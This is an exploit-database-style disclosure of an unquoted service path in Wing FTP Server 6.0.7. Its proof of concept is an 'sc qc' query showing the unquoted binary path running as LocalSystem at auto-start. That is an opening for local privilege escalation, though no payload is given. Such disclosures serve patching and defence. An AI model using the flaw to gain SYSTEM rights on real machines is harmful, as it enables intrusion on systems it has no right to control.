Share
# Exploit Title: Wing FTP Server 6.0.7 - Unquoted Service Path  
# Date: 2019-12-30  
# Exploit Author: Nawaf Alkeraithe  
# Vendor Homepage: https://www.wftpserver.com/  
# Version: 6.0.7  
# Tested on: Windows 10  
# CVE : N/A  
  
# PoC:  
  
C:\Users\user>sc qc "Wing FTP Server"  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: Wing FTP Server  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\Wing FTP  
Server\WFTPServer.exe service  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Wing FTP Server  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem